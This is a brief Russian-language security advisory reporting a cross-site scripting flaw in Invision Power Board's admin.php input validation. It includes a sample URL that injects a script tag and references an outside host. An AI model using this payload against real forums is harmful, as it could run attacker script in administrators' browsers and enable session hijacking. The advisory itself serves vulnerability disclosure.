Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.
Пример:
http://forums.invisionpower.com/admin.php? adse ss='><script>window.open (window.location.search.substring
(78));</script><http://binaryvision.tech.nu? BoyBear$$$From$$$BinaryVision